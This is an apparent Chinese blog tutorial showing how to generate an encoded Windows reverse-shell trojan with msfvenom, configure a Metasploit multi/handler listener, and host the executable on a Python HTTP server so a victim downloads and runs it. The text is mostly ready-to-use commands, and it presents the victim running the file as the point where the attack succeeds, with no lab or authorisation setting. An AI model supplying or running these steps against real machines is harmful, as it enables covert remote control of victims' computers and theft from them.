使用msf生成木马反弹shell(windows系统)

一、理论总结

使用msf进行木马攻击总共分为三步即可:

1、生成攻击木马

2、配置监控主机

3、上传木马使得靶机中招

1.1生成攻击木马

使用msf来生成木马是一个比较方便的事情,使用msfvenom即可,框架模版为:

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai  -f exe -o  new.exe -i 5

具体的含义可以查阅该专栏下的另外一篇文章msfvenom基本介绍

1.2 配置监控主机

配置监控也是在msf中进行相关参数的配置即可。

1. 启动msf   终端内输入:msfconsole 启动msf

2. 载入监控模块  msf中输入: use exploit/multi/handler

3. 加载payload  msf终端中输入:set payload windows/meterpreter/reverse_tcp

4. 配置payload  msf终端中输入:show options

5. 配置payload监控IP msf终端中输入: set  lhost  {监控IP}

6. 配置payload监控端口  msf终端中输入:set lport  {监控端口} (注意这里要和木马配置时使用的端口相同&如果使用内网穿透服务填写转发后的端口)

7. 检查payload配置  msf终端中输入:show options 

8. 执行监控  msf终端中输入: run

1.3 上传木马

上传木马有多种方式,当受害者把你的木马从网上下载运行的时候你的攻击就成功了。

二、实战演练

首先生成需要攻击的机器对应的木马

模版:

msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai  -f exe -o  new.exe -i 5

监控ip即为攻击者本机的ip地址,可以选择使用ifconfig或者ip -a来查看。Lport如果你不进行更改它会默认放在4444端口进行监听。

指令输入后会有如下显示:

使用msf生成木马反弹shell(windows系统)_第1张图片

使用ls来查看目录发现存在相应文件 shell.exe:

在木马完成生成后需要做的是配置监控:

如上文的步骤

1、msfconsole

启动msf

使用msf生成木马反弹shell(windows系统)_第2张图片

 2、use exploit/multi/handler

       set payload windows/meterpreter/reverse_tcp

载入监控模块

监控的对象需要和我们上面生成的后门相一致:

使用msf生成木马反弹shell(windows系统)_第3张图片

 3、set  lhost  {监控IP}

       set lport   {监控端口}

 到这一步即监听配置完成。

4、使用最新的python服务上传木马

python2 -m SimpleHTTPServer 8080
使用该指令快速搭建服务器,即可访问该文件将木马下载运行,即获得控制权。

这边在自己将本机搭建为服务器之后,在登陆该网址的时候记得得用http而不是https,否则会出现无法登陆的情况。

你可能感兴趣的:(#msf,windows,网络,运维)